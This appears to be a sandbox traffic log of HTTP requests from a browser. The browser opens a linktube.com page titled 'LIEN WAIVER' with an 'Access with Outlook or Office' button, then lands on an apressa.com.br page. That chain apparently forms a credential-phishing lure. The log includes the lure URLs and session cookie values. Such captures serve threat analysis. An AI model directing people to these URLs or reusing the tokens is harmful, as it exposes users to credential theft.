Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864710&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceAttribution-Reporting-Support: web, not-osSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/links/140134/track HTTP/1.1Host: linktube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false; _fuid=MDBlMmI3NjAtNzMxMy00MmE5LWI2YTEtNmYxYzk5MTE2NDMw; _fbp=fb.1.1743018861934.367737420634560964; XSRF-TOKEN=eyJpdiI6InFJOGRSSVdYV0JQOEphUHBvUHJxSUE9PSIsInZhbHVlIjoiRHZwQUkrRW5qYkY1NWFCcXMwZC9BZ2dBakh0bTF0eEZGMTgwS3lOYW1GN1oyU0ZRS1hYMDNrTFU4akRxVTFoUyIsIm1hYyI6ImVkMzE3NDhkYTA2MjdjZGRjODAwMjdiMzllMzg4ZDhjYWYwY2Q3YzdmNjAyZDdlODhlYzhhMGU5NDJkNTExZmMifQ%3D%3D; linktube_session=eyJpdiI6InVjUUxra0FWakhsNlFGSmRydVQ0cnc9PSIsInZhbHVlIjoiTlR0NlNwVFowbFhFMUtOME5JNnhabVI2a1U1NE16RGZyUStSUlJtcjRNSWZHR3l5OXYrb3M5RTZqSC9vQXdwNyIsIm1hYyI6ImM3MzM2NTA5Y2YzNWFlZjdmNjQ5ZjA3YTlkMTgwZjRhMGE0NDVhN2RkOTdkNGU0MDM2ODNhNjIyM2U0ODU2YmIifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.2.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://apressa.com.br/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864710&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=209431097234591&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864711&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=209431097234591&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864711&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: event-source, trigger, not-navigation-sourceAttribution-Reporting-Support: web, not-osSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864707&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864710&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=370162274269334&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864712&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: apressa.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=370162274269334&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864712&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: event-source, triggerAttribution-Reporting-Support: web=osSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=209431097234591&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864711&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=209431097234591&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864711&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=138748961041622&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864713&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.190&r=stable&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=138748961041622&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864713&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.190&r=stable&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceAttribution-Reporting-Support: web=osSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=370162274269334&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864712&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=432952554585575&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864714&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=370162274269334&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864712&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=432952554585575&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864714&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&sw=1280&sh=1024&v=2.9.190&r=stable&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: event-source, triggerAttribution-Reporting-Support: webSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=138748961041622&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864713&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.190&r=stable&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=138748961041622&ev=SubscribedButtonClick&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864713&cd[buttonFeatures]=%7B%22classList%22%3A%22page-link%20button%20custom-appearance-applied%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Access%20with%20Outlook%20or%20Office%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Access%20with%20Outlook%20or%20Office&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22LIEN%20WAIVER%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.190&r=stable&ec=1&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&es=automatic&tm=3&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/03/favicon-100x100.jpg HTTP/1.1Host: apressa.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apressa.com.br/offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+OfficeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
